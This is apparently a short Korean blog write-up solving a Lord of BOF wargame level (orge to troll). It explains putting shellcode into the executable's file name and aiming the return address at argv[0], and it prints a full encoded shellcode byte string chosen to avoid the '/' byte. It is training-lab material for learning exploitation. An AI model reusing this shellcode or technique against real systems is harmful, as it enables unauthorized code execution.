LOB - level8 [orge -> troll]

 

이전 문제랑 다른 점은 인자 갯수가 2개여야하고, memset함수를 두번 써줬다. 

 

argv[1]도 초기와 된다.. ㅂㄷㅂㄷ

 

아마 파일이름에 쉘코드를 넣고 argv[0] 를 ret에 넣어야될 것 같다.

 

그러려면 쉘코드에 2f가 들어가면 안된다. "/" 로 인식이 되기 때문에 오류가 발생하기 때문이다.

 

쉘코드는 \xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

이걸 사용했다.

 

파일이름을 바꾸고 익스를 해보자.

 

argv[0]의 주소를 구해보자.

 

네모부터 쉘코드의 시작이다.

 

적당히 c0 주소로 박고 익스를 하였다.